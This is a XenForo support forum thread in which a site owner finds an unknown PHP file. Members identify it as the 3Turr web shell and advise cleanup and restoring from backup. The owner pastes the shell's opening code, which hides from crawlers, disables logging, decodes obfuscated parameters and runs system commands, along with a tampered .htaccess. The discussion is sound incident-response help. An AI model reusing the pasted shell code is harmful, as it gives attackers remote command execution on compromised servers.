XF 2.2 What is 3tr.php for File?

It hasn’t come from XF.

It may be worth posting the contents of the file so we can try and identify what it’s for and maybe where it’s come from.
 
when I read in the file, at the top it says: 3Turr, I google on 3Turr this is coming https://toolspro.io/shell/3turr-webshell-php-script/

same image as on my file
Sorry our posts crossed.

If that is indeed what the script is then you must remove it from your server immediately and attempt to identify how it got on your server.

This suggests your server has been compromised in some way.
 
781301233<?php
// 3Turr
@define('VERSION','2.0');
@error_reporting(1);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.1 404 Not Found');
exit;
}

if (base64_decode($_POST['p1'], true) && ($_POST['p1'] != 'mkdir' && $_POST['p1'] != 'uploadFile') && ($_POST['p2'] != 'd2' ) ){

$_POST['p1'] = base64_decode(urldecode($_POST['p1']));
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
$sys='win';
else
$sys='unix';
$home_cwd = @getcwd();
if(base64_decode($_REQUEST['c'], true))
$_REQUEST['c'] = base64_decode(urldecode($_REQUEST['c']));
@chdir($_REQUEST['c']);
$cwd = @getcwd();
if($sys == 'win')
{
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';
function yemenEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("
",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}

<removed by moderator>
 
Last edited by a moderator:
created today, .htaccess file

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
 
Sorry our posts crossed.

If that is indeed what the script is then you must remove it from your server immediately and attempt to identify how it got on your server.

This suggests your server has been compromised in some way.
No danger, I talk to the cough at the same time, they also checked now and said that I should delete it immediately. Which I did
 
That (almost) 100% indicates that your site/server has been compromised.

Ideally, you need to take your site offline and change any passwords that can access it. However, as the site as been compromised, you can't trust its contents and thus there may be multiple backdoors hidden which could allow the attacker access again. Ideally, you'd want to restore a backup that is known to not be compromised, though that can be difficult. Your host may be able to help point you to things, though it really depends on how the attacker gained access. There are some somewhat general suggestions on this page:


The key is that you have to be as certain as possible that all changes the attacker has made have been removed and whatever method they used to gain access to the server in the first place has been closed.
 
Is there anyone here who can log in to my host and see if there are any other malicious files, or modified files?
If the host has been compromised you can't trust it's output.
So even if the files do look clean, they might in fact me modified.
The only way to be pretty certain would be to completely wipe the server (including to OS) and reload a "known clean" backup, and this still requires trust that the firmware has not been compromised.

Someone who knows or knows of a file that ends up xml.gz?
XML sitemaps are often stored this way.
 
If the host has been compromised you can't trust it's output.
So even if the files do look clean, they might in fact me modified.
The only way to be pretty certain would be to completely wipe the server (including to OS) and reload a "known clean" backup, and this still requires trust that the firmware has not been compromised.


XML sitemaps are often stored this way.
Ok, uploading a "secure" backup also means that all written posts until now will disappear?
 
Top Bottom